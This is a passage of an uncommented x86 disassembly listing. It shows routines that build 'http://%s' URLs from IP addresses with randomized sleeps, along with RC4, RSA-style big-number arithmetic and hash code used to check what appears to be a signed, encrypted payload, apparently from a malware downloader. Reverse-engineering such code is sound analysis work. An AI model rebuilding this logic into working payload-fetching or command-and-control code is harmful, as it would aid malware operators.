call sub_9A5C88
pop ecx
test eax, eax
jz loc_9A880A
push esi ; netlong
call sub_9A4033
pop ecx
test eax, eax
jnz loc_9A880A
mov [ebp+var_B4], eax
mov [ebp+var_A8], eax
loc_9A878C: ; CODE XREF: sub_9A857A+287�j
mov ecx, [ebp+var_A0]
cmp [ebp+var_A8], ecx
jnb short loc_9A87AF
mov ecx, [ebp+var_A8]
cmp esi, [ebp+ecx*4+Dst]
jnz short loc_9A87FB
mov [ebp+var_B4], edi
loc_9A87AF: ; CODE XREF: sub_9A857A+21E�j
cmp [ebp+var_B4], eax
jnz short loc_9A880A
push esi ; in
call inet_ntoa
mov [ebp+var_C0], eax
test eax, eax
jz short loc_9A880A
push eax
push offset aHttpS ; "http://%s"
push 80h ; Count
lea eax, [ebp+Dest]
push eax ; Dest
call _snprintf
mov [ebp+var_1D], 0
lea eax, [ebp+Dest]
push eax
call sub_9A8179
add esp, 14h
mov [ebp+var_B0], eax
jmp short loc_9A880A
; ---------------------------------------------------------------------------
loc_9A87FB: ; CODE XREF: sub_9A857A+22D�j
inc [ebp+var_A8]
jmp short loc_9A878C
; ---------------------------------------------------------------------------
loc_9A8803: ; DATA XREF: .text:009A3530�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_9A880A: ; CODE XREF: sub_9A857A+19F�j
; sub_9A857A+1BE�j ...
and [ebp+ms_exc.disabled], 0
call GetTickCount
mov esi, eax
sub esi, [ebp+var_B8]
mov [ebp+var_B8], esi
push offset dword_9BB310
call sub_9AA638
pop ecx
xor edx, edx
push 29h
pop ecx
div ecx
add edx, 0Ah
imul edx, 3E8h
mov [ebp+var_C8], edx
cmp edx, esi
jbe short loc_9A8850
sub edx, esi
push edx ; dwMilliseconds
call Sleep
loc_9A8850: ; CODE XREF: sub_9A857A+2CB�j
inc [ebp+var_A0]
jmp loc_9A86B7
; ---------------------------------------------------------------------------
loc_9A885B: ; DATA XREF: .text:stru_9A3520�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A885F: ; DATA XREF: .text:stru_9A3520�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A8862: ; CODE XREF: sub_9A857A+65�j
; sub_9A857A+94�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov [ebp+ms_exc.disabled], 2
cmp [ebp+hMem], 0
jz short loc_9A88BE
and [ebp+var_A0], 0
mov esi, GlobalFree
loc_9A8883: ; CODE XREF: sub_9A857A+331�j
cmp [ebp+var_A0], 0C350h
jnb short loc_9A88AD
mov eax, [ebp+hMem]
mov ecx, [ebp+var_A0]
mov eax, [eax+ecx*4]
test eax, eax
jz short loc_9A88A5
push eax ; hMem
call esi ; GlobalFree
loc_9A88A5: ; CODE XREF: sub_9A857A+326�j
inc [ebp+var_A0]
jmp short loc_9A8883
; ---------------------------------------------------------------------------
loc_9A88AD: ; CODE XREF: sub_9A857A+313�j
push [ebp+hMem] ; hMem
call esi ; GlobalFree
jmp short loc_9A88BE
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_9A88BE: ; CODE XREF: sub_9A857A+2FA�j
; sub_9A857A+33B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_B0]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A857A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A88D8 proc near ; CODE XREF: sub_9A898A+16�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
mov [eax], edx
mov [eax+4], edx
xor ecx, ecx
loc_9A88E7: ; CODE XREF: sub_9A88D8+1A�j
mov [eax+ecx*4+8], ecx
inc ecx
cmp ecx, 100h
jl short loc_9A88E7
push ebx
push esi
push edi
xor esi, esi
mov [ebp+arg_0], edx
loc_9A88FC: ; CODE XREF: sub_9A88D8+56�j
mov ecx, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov bl, [esi+ebx]
add bl, dl
lea edi, [eax+ecx*4+8]
mov ecx, [edi]
add bl, cl
movzx edx, bl
mov ebx, [eax+edx*4+8]
inc esi
cmp esi, [ebp+arg_8]
mov [edi], ebx
mov [eax+edx*4+8], ecx
jl short loc_9A8924
xor esi, esi
loc_9A8924: ; CODE XREF: sub_9A88D8+48�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 100h
jl short loc_9A88FC
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9A88D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8935 proc near ; CODE XREF: sub_9A898A+28�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ebx
mov ebx, [eax]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jle short loc_9A8981
push esi
loc_9A894A: ; CODE XREF: sub_9A8935+49�j
inc bl
movzx ebx, bl
mov edx, [eax+ebx*4+8]
add cl, dl
movzx ecx, cl
lea esi, [eax+ecx*4+8]
mov [ebp+arg_0], ecx
mov ecx, [esi]
mov [eax+ebx*4+8], ecx
add cl, dl
mov [esi], edx
mov esi, [ebp+arg_4]
movzx ecx, cl
mov cl, [eax+ecx*4+8]
add esi, edi
xor [esi], cl
mov ecx, [ebp+arg_0]
inc edi
cmp edi, [ebp+arg_8]
jl short loc_9A894A
pop esi
loc_9A8981: ; CODE XREF: sub_9A8935+12�j
pop edi
mov [eax], ebx
mov [eax+4], ecx
pop ebx
pop ebp
retn
sub_9A8935 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A898A proc near ; CODE XREF: sub_9A8C4C+A9�p
var_408 = byte ptr -408h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 408h
push [ebp+arg_C]
lea eax, [ebp+var_408]
push [ebp+arg_8]
push eax
call sub_9A88D8
push [ebp+arg_4]
lea eax, [ebp+var_408]
push [ebp+arg_0]
push eax
call sub_9A8935
add esp, 18h
leave
retn
sub_9A898A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A89BC proc near ; CODE XREF: sub_9A8A16+3E�p
; sub_9A8A16+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov ecx, 80h
loc_9A89CD: ; CODE XREF: sub_9A89BC+1E�j
mov eax, [esi+ecx*4]
mov ebx, [edi+ecx*4]
cmp eax, ebx
jb short loc_9A89E0
ja short loc_9A89E7
dec ecx
jns short loc_9A89CD
xor eax, eax
jmp short loc_9A89EC
; ---------------------------------------------------------------------------
loc_9A89E0: ; CODE XREF: sub_9A89BC+19�j
mov eax, 0FFFFFFFFh
jmp short loc_9A89EC
; ---------------------------------------------------------------------------
loc_9A89E7: ; CODE XREF: sub_9A89BC+1B�j
mov eax, 1
loc_9A89EC: ; CODE XREF: sub_9A89BC+22�j
; sub_9A89BC+29�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9A89BC endp
; =============== S U B R O U T I N E =======================================
sub_9A89F1 proc near ; CODE XREF: sub_9A8A16+13�p
; sub_9A8AD9+38�p
arg_0 = dword ptr 4
mov eax, 101Fh
push esi
loc_9A89F7: ; CODE XREF: sub_9A89F1+1F�j
mov esi, [esp+4+arg_0]
mov edx, eax
shr edx, 5
mov edx, [esi+edx*4]
mov ecx, eax
and ecx, 1Fh
shr edx, cl
test dl, 1
jnz short loc_9A8A14
dec eax
jns short loc_9A89F7
xor eax, eax
loc_9A8A14: ; CODE XREF: sub_9A89F1+1C�j
pop esi
retn
sub_9A89F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8A16(void *Dst,int,int)
sub_9A8A16 proc near ; CODE XREF: sub_9A8AD9+74�p
; sub_9A8AD9+A1�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 204h ; Size
push 0 ; Val
push [ebp+Dst] ; Dst
call memset
push ebx
call sub_9A89F1
mov edx, eax
add esp, 10h
test edx, edx
jl loc_9A8AD7
push esi
push edi
loc_9A8A3D: ; CODE XREF: sub_9A8A16+B9�j
mov edi, [ebp+Dst]
xor eax, eax
mov ecx, 81h
loc_9A8A47: ; CODE XREF: sub_9A8A16+36�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_9A8A47
push [ebp+arg_8]
push [ebp+Dst]
call sub_9A89BC
test eax, eax
pop ecx
pop ecx
jl short loc_9A8A78
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9A8A6C: ; CODE XREF: sub_9A8A16+60�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9A8A6C
loc_9A8A78: ; CODE XREF: sub_9A8A16+47�j
mov eax, edx
shr eax, 5
mov eax, [ebx+eax*4]
mov ecx, edx
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9A8ACE
mov edi, [ebp+Dst]
mov esi, [ebp+arg_4]
mov ecx, 81h
xor eax, eax
loc_9A8A98: ; CODE XREF: sub_9A8A16+8C�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9A8A98
push [ebp+arg_8]
push [ebp+Dst]
call sub_9A89BC
test eax, eax
pop ecx
pop ecx
jl short loc_9A8ACE
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9A8AC2: ; CODE XREF: sub_9A8A16+B6�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9A8AC2
loc_9A8ACE: ; CODE XREF: sub_9A8A16+73�j
; sub_9A8A16+9D�j
dec edx
jns loc_9A8A3D
pop edi
pop esi
loc_9A8AD7: ; CODE XREF: sub_9A8A16+1F�j
pop ebp
retn
sub_9A8A16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8AD9 proc near ; CODE XREF: sub_9A8BA1+89�p
var_410 = byte ptr -410h
Dst = byte ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 410h
push esi
push 200h ; Size
lea eax, [edi+4]
push 0 ; Val
push eax ; Dst
mov dword ptr [edi], 1
call memset
mov esi, 204h
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call memcpy
push [ebp+arg_4]
call sub_9A89F1
and [ebp+var_4], 0
add esp, 1Ch
test eax, eax
mov [ebp+var_8], eax
jl short loc_9A8B9E
push ebx
loc_9A8B25: ; CODE XREF: sub_9A8AD9+C2�j
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov eax, ecx
shr eax, 5
mov eax, [edx+eax*4]
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9A8B63
push [ebp+arg_8] ; int
lea eax, [ebp+var_410]
push edi ; int
push eax ; Dst
lea ebx, [ebp+Dst]
call sub_9A8A16
push esi ; Size
lea eax, [ebp+var_410]
push eax ; Src
push edi ; Dst
call memcpy
add esp, 18h
loc_9A8B63: ; CODE XREF: sub_9A8AD9+61�j
push [ebp+arg_8] ; int
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+var_410]
push eax ; Dst
lea ebx, [ebp+Dst]
call sub_9A8A16
push esi ; Size
lea eax, [ebp+var_410]
push eax ; Src
mov eax, ebx
push eax ; Dst
call memcpy
add esp, 18h
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jle short loc_9A8B25
pop ebx
loc_9A8B9E: ; CODE XREF: sub_9A8AD9+49�j
pop esi
leave
retn
sub_9A8AD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8BA1(void *Src,int,int,int)
sub_9A8BA1 proc near ; CODE XREF: sub_9A8C4C+5F�p
var_810 = byte ptr -810h
var_611 = byte ptr -611h
var_60C = byte ptr -60Ch
var_408 = byte ptr -408h
var_208 = dword ptr -208h
var_204 = dword ptr -204h
Dst = byte ptr -200h
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_4]
push esi
push edi
mov esi, 200h
push esi ; Size
mov [ebp+var_204], eax
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call memset
push 204h ; Size
lea eax, [ebp+var_60C]
push 0 ; Val
push eax ; Dst
call memset
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebp+var_60C]
push eax ; Dst
call memcpy
mov eax, [ebp+arg_C]
and [ebp+var_208], 0
add esp, 24h
xor ecx, ecx
add eax, 1FFh
loc_9A8C00: ; CODE XREF: sub_9A8BA1+6C�j
mov dl, [eax]
mov [ebp+ecx+var_408], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9A8C00
lea eax, [ebp+var_60C]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_408]
push eax
lea edi, [ebp+var_810]
call sub_9A8AD9
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_611]
loc_9A8C3A: ; CODE XREF: sub_9A8BA1+A5�j
mov dl, [eax]
mov edi, [ebp+arg_8]
mov [ecx+edi], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9A8C3A
pop edi
pop esi
leave
retn
sub_9A8BA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8C4C(void *Src,int,int,int,int)
sub_9A8C4C proc near ; CODE XREF: sub_9A8133+2A�p
; sub_9B3150-308A�p
Buf1 = byte ptr -404h
var_403 = byte ptr -403h
Dst = byte ptr -402h
var_244 = byte ptr -244h
Buf2 = byte ptr -204h
var_84 = byte ptr -84h
var_44 = byte ptr -44h
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 404h
mov eax, dword_9B8788
push ebx
mov ebx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_C]
push edi
mov edi, [ebp+Src]
xor eax, ebp
push 1FEh ; Size
mov [ebp+var_4], eax
lea eax, [ebp+Dst]
push 0FFh ; Val
push eax ; Dst
mov [ebp+Buf1], 0
mov [ebp+var_403], 1
call memset
lea eax, [ebp+var_244]
push eax ; Dst
push [ebp+arg_10] ; int
push esi ; int
call sub_9A8D34
push ebx ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+arg_4] ; int
push edi ; Src
call sub_9A8BA1
push 180h ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
lea eax, [ebp+Buf1]
push eax ; Buf1
call memcmp
add esp, 34h
test eax, eax
jnz short loc_9A8D23
push 40h ; Size
lea eax, [ebp+var_44]
push eax ; Buf2
lea eax, [ebp+var_244]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A8D23
push 40h
lea eax, [ebp+var_84]
push eax
push [ebp+arg_10]
push esi
call sub_9A898A
lea eax, [ebp+var_44]
push eax ; Dst
push [ebp+arg_10] ; int
push esi ; int
call sub_9A8D34
push 40h ; Size
lea eax, [ebp+var_44]
push eax ; Buf2
lea eax, [ebp+var_84]
push eax ; Buf1
call memcmp
add esp, 28h
neg eax
sbb eax, eax
inc eax
jmp short loc_9A8D25
; ---------------------------------------------------------------------------
loc_9A8D23: ; CODE XREF: sub_9A8C4C+81�j
; sub_9A8C4C+9A�j
xor eax, eax
loc_9A8D25: ; CODE XREF: sub_9A8C4C+D5�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
leave
retn
sub_9A8C4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8D34(int,int,void *Dst)
sub_9A8D34 proc near ; CODE XREF: sub_9A8C4C+4E�p
; sub_9A8C4C+B6�p
var_3CDC = dword ptr -3CDCh
Src = byte ptr -3CD4h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Dst = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 3CDCh
call __alloca_probe
mov eax, dword_9B8788
push esi
mov esi, [ebp+arg_0]
xor eax, ebp
push edi
mov edi, [ebp+Dst]
mov [ebp+var_4], eax
lea eax, [ebp+var_3CDC]
push 200h ; int
push eax ; Dst
call sub_9A8F65
mov eax, [ebp+arg_4]
push 8
pop ecx
mul ecx
push edx
push eax
lea eax, [ebp+var_3CDC]
push esi
push eax
call sub_9A9237
lea eax, [ebp+var_3CDC]
push 0 ; Dst
push eax ; int
call sub_9A942A
push 40h ; Size
lea eax, [ebp+Src]
push eax ; Src
push edi ; Dst
call memcpy
mov ecx, [ebp+var_4]
add esp, 2Ch
pop edi
xor ecx, ebp
pop esi
call sub_9AAAC1
leave
retn
sub_9A8D34 endp
; =============== S U B R O U T I N E =======================================
sub_9A8DA9 proc near ; CODE XREF: sub_9A8E1C+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edx, edx
or edx, esi
xor ecx, ecx
or eax, ecx
mov ebx, edx
mov esi, edx
mov edi, eax
shld ebx, edi, 10h
mov ecx, eax
shrd ecx, esi, 10h
shld edx, eax, 10h
shl edi, 10h
xor ecx, edi
shr esi, 10h
xor esi, ebx
shl eax, 10h
mov edi, 0FFFFh
and esi, edi
and ecx, edi
xor esi, edx
xor ecx, eax
mov ebx, esi
mov edx, esi
mov edi, ecx
shld ebx, edi, 8
mov eax, ecx
shrd eax, edx, 8
shl edi, 8
shr edx, 8
xor eax, edi
shld esi, ecx, 8
xor edx, ebx
mov edi, 0FF00FFh
and eax, edi
and edx, edi
pop edi
xor edx, esi
shl ecx, 8
pop esi
xor eax, ecx
pop ebx
retn
sub_9A8DA9 endp
; =============== S U B R O U T I N E =======================================
sub_9A8E1C proc near ; CODE XREF: sub_9A8FF3+6A�p
; sub_9A942A+62�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
xor edi, edi
cmp [esp+4+arg_4], edi
jle short loc_9A8E46
push esi
loc_9A8E26: ; CODE XREF: sub_9A8E1C+27�j
mov eax, [esp+8+arg_0]
lea esi, [eax+edi*8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_9A8DA9
inc edi
cmp edi, [esp+10h+arg_4]
pop ecx
pop ecx
mov [esi], eax
mov [esi+4], edx
jl short loc_9A8E26
pop esi
loc_9A8E46: ; CODE XREF: sub_9A8E1C+7�j
pop edi
retn
sub_9A8E1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8E48 proc near ; CODE XREF: sub_9A9237+BC�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov edi, [ebp+arg_C]
xor edx, edx
cmp edi, edx
jz loc_9A8F62
mov eax, [ebp+arg_4]
mov ecx, eax
and ecx, 7
push ebx
push esi
mov [ebp+var_4], edx
jz short loc_9A8E86
mov ebx, [ebp+arg_0]
mov edx, ecx
mov esi, eax
shr esi, 3
mov bl, [esi+ebx]
mov cl, 8
sub cl, dl
shr bl, cl
movzx cx, bl
mov word ptr [ebp+var_4], cx
loc_9A8E86: ; CODE XREF: sub_9A8E48+21�j
add edi, 7
shr eax, 3
shr edi, 3
xor esi, esi
test edi, edi
mov [ebp+var_C], eax
jle loc_9A8F60
lea eax, [edi-1]
loc_9A8E9F: ; CODE XREF: sub_9A8E48+112�j
cmp esi, eax
jz short loc_9A8EB7
mov eax, [ebp+arg_8]
movzx ax, byte ptr [esi+eax]
xor ecx, ecx
mov ch, byte ptr [ebp+var_4]
xor eax, ecx
add edx, 8
jmp short loc_9A8EE7
; ---------------------------------------------------------------------------
loc_9A8EB7: ; CODE XREF: sub_9A8E48+59�j
mov eax, [ebp+arg_C]
and eax, 7
mov [ebp+var_8], 8
jz short loc_9A8EC9
mov [ebp+var_8], eax
loc_9A8EC9: ; CODE XREF: sub_9A8E48+7C�j
mov eax, [ebp+arg_8]
movzx eax, byte ptr [esi+eax]
mov ebx, [ebp+var_4]
mov cl, 8
sub cl, byte ptr [ebp+var_8]
shr al, cl
mov ecx, [ebp+var_8]
shl ebx, cl
movzx ax, al
or eax, ebx
add edx, ecx
loc_9A8EE7: ; CODE XREF: sub_9A8E48+6D�j
mov [ebp+var_4], eax
xor ecx, ecx
lea eax, [edi-1]
cmp esi, eax
setnz cl
mov [ebp+var_10], ecx
loc_9A8EF7: ; CODE XREF: sub_9A8E48+10D�j
mov ecx, [ebp+var_10]
xor eax, eax
cmp edx, 8
setnl al
test eax, ecx
jnz short loc_9A8F1B
xor ecx, ecx
lea eax, [edi-1]
cmp esi, eax
setz cl
xor ebx, ebx
test edx, edx
setnle bl
test ecx, ebx
jz short loc_9A8F57
loc_9A8F1B: ; CODE XREF: sub_9A8E48+BC�j
push 8
pop eax
cmp edx, eax
mov [ebp+var_8], eax
jg short loc_9A8F28
mov [ebp+var_8], edx
loc_9A8F28: ; CODE XREF: sub_9A8E48+DB�j
mov ebx, [ebp+var_4]
mov cl, dl
sub cl, byte ptr [ebp+var_8]
shr bx, cl
mov ecx, eax
sub ecx, [ebp+var_8]
mov eax, 0FF00h
shl bl, cl
mov ecx, [ebp+var_8]
sar eax, cl
mov ecx, [ebp+var_C]
and bl, al
mov eax, [ebp+arg_0]
inc [ebp+var_C]
sub edx, [ebp+var_8]
mov [ecx+eax], bl
jmp short loc_9A8EF7
; ---------------------------------------------------------------------------
loc_9A8F57: ; CODE XREF: sub_9A8E48+D1�j
inc esi
cmp esi, edi
jl loc_9A8E9F
loc_9A8F60: ; CODE XREF: sub_9A8E48+4E�j
pop esi
pop ebx
loc_9A8F62: ; CODE XREF: sub_9A8E48+E�j
pop edi
leave
retn
sub_9A8E48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8F65(void *Dst,int)
sub_9A8F65 proc near ; CODE XREF: sub_9A8D34+2B�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
push edi
push 4
cdq
pop ecx
idiv ecx
mov esi, [ebp+Dst]
mov edi, eax
add edi, 28h
test esi, esi
jnz short loc_9A8F84
push 3
pop eax
jmp short loc_9A8FEF
; ---------------------------------------------------------------------------
loc_9A8F84: ; CODE XREF: sub_9A8F65+18�j
push ebx
xor ebx, ebx
inc ebx
cmp [ebp+arg_4], ebx
jl short loc_9A8FEB
cmp [ebp+arg_4], 200h
jg short loc_9A8FEB
push 3CD8h ; Size
push 0 ; Val
push esi ; Dst
call memset
mov eax, [ebp+arg_4]
xor ecx, ecx
add esp, 0Ch
mov [esi], eax
xor eax, eax
cmp edi, 0FFh
setnle cl
xor edx, edx
cmp edi, eax
setl dl
mov [esi+168h], eax
mov dword ptr [esi+16Ch], 40h
or ecx, edx
jz short loc_9A8FD7
push 11h
jmp short loc_9A8FED
; ---------------------------------------------------------------------------
loc_9A8FD7: ; CODE XREF: sub_9A8F65+6C�j
mov [esi+170h], edi
mov [esi+10Ch], ebx
mov [esi+174h], ebx
jmp short loc_9A8FEE
; ---------------------------------------------------------------------------
loc_9A8FEB: ; CODE XREF: sub_9A8F65+26�j
; sub_9A8F65+2F�j
push 2
loc_9A8FED: ; CODE XREF: sub_9A8F65+70�j
pop eax
loc_9A8FEE: ; CODE XREF: sub_9A8F65+84�j
pop ebx
loc_9A8FEF: ; CODE XREF: sub_9A8F65+1D�j
pop edi
pop esi
pop ebp
retn
sub_9A8F65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8FF3 proc near ; CODE XREF: sub_9A90E2+A2�p
Dst = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_9A9003
push 3
jmp short loc_9A900E
; ---------------------------------------------------------------------------
loc_9A9003: ; CODE XREF: sub_9A8FF3+A�j
cmp dword ptr [esi+10Ch], 0
jnz short loc_9A9014
push 5
loc_9A900E: ; CODE XREF: sub_9A8FF3+E�j
pop eax
jmp loc_9A90DF
; ---------------------------------------------------------------------------
loc_9A9014: ; CODE XREF: sub_9A8FF3+17�j
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
jge short loc_9A9024
push 6
loc_9A901E: ; CODE XREF: sub_9A8FF3+38�j
pop eax
jmp loc_9A90DE
; ---------------------------------------------------------------------------
loc_9A9024: ; CODE XREF: sub_9A8FF3+27�j
cmp ebx, 1Ch
jl short loc_9A902D
push 7
jmp short loc_9A901E
; ---------------------------------------------------------------------------
loc_9A902D: ; CODE XREF: sub_9A8FF3+34�j
lea eax, [esi+118h]
add dword ptr [eax], 1
adc dword ptr [eax+4], 0
cmp ebx, 1
jnz short loc_9A9064
mov eax, [esi+16Ch]
inc eax
cmp eax, ebx
jle short loc_9A9054
push 40h
lea eax, [esi+378h]
jmp short loc_9A905C
; ---------------------------------------------------------------------------
loc_9A9054: ; CODE XREF: sub_9A8FF3+55�j
push 30h
lea eax, [esi+3F8h]
loc_9A905C: ; CODE XREF: sub_9A8FF3+5F�j
push eax
call sub_9A8E1C
pop ecx
pop ecx
loc_9A9064: ; CODE XREF: sub_9A8FF3+4A�j
push edi
lea ecx, [esi+ebx*4+3B78h]
mov [ebp+arg_4], ecx
mov eax, 1000h
sub eax, [ecx]
mov ecx, ebx
shl ecx, 9
lea ecx, [ecx+esi+178h]
push ecx
push dword ptr [esi]
lea edi, [esi+ebx*8+3BF0h]
push dword ptr [esi+168h]
add esi, 128h
push eax
push [ebp+arg_C]
mov [ebp+Dst], ecx
push dword ptr [esi+44h]
push dword ptr [esi+48h]
push dword ptr [edi]
push ebx
push esi
push (offset loc_9A3547+1)
push [ebp+arg_0]
call sub_9A9E4E
xor ecx, ecx
add esp, 30h
cmp eax, ecx
jnz short loc_9A90DD
add dword ptr [edi], 1
mov eax, [ebp+arg_4]
push 200h ; Size
adc [edi+4], ecx
push ecx ; Val
push [ebp+Dst] ; Dst
mov [eax], ecx
call memset
add esp, 0Ch
xor eax, eax
loc_9A90DD: ; CODE XREF: sub_9A8FF3+CA�j
pop edi
loc_9A90DE: ; CODE XREF: sub_9A8FF3+2C�j
pop ebx
loc_9A90DF: ; CODE XREF: sub_9A8FF3+1C�j
pop esi
leave
retn
sub_9A8FF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A90E2 proc near ; CODE XREF: sub_9A90E2+148�p
; sub_9A9237+FD�p ...
Src = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 80h
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
jnz short loc_9A90FA
push 3
jmp short loc_9A9104
; ---------------------------------------------------------------------------
loc_9A90FA: ; CODE XREF: sub_9A90E2+12�j
cmp [esi+10Ch], ebx
jnz short loc_9A910A
push 5
loc_9A9104: ; CODE XREF: sub_9A90E2+16�j
pop eax
jmp loc_9A9233
; ---------------------------------------------------------------------------
loc_9A910A: ; CODE XREF: sub_9A90E2+1E�j
cmp [ebp+arg_8], ebx
push edi
mov edi, [ebp+arg_4]
jnz short loc_9A9127
cmp dword ptr [esi+edi*4+3B78h], 1000h
jnb short loc_9A916D
loc_9A9120: ; CODE XREF: sub_9A90E2+6C�j
; sub_9A90E2+77�j ...
xor eax, eax
jmp loc_9A9232
; ---------------------------------------------------------------------------
loc_9A9127: ; CODE XREF: sub_9A90E2+2F�j
cmp edi, [esi+174h]
jnz short loc_9A916D
mov eax, [esi+16Ch]
inc eax
cmp edi, eax
jnz short loc_9A915B
cmp dword ptr [esi+edi*4+3B78h], 400h
jnz short loc_9A916D
cmp [esi+edi*8+3BF4h], ebx
ja short loc_9A9120
cmp [esi+edi*8+3BF0h], ebx
jbe short loc_9A916D
jmp short loc_9A9120
; ---------------------------------------------------------------------------
loc_9A915B: ; CODE XREF: sub_9A90E2+56�j
cmp edi, 1
jle short loc_9A916D
cmp dword ptr [esi+edi*4+3B78h], 400h
jz short loc_9A9120
loc_9A916D: ; CODE XREF: sub_9A90E2+3C�j
; sub_9A90E2+4B�j ...
cmp [ebp+arg_8], ebx
jz short loc_9A917D
cmp edi, [esi+174h]
jnz short loc_9A917D
xor ebx, ebx
inc ebx
loc_9A917D: ; CODE XREF: sub_9A90E2+8E�j
; sub_9A90E2+96�j
push ebx
push edi
lea eax, [ebp+Src]
push esi
push eax
call sub_9A8FF3
add esp, 10h
test eax, eax
jnz loc_9A9232
cmp ebx, 1
jnz short loc_9A91B3
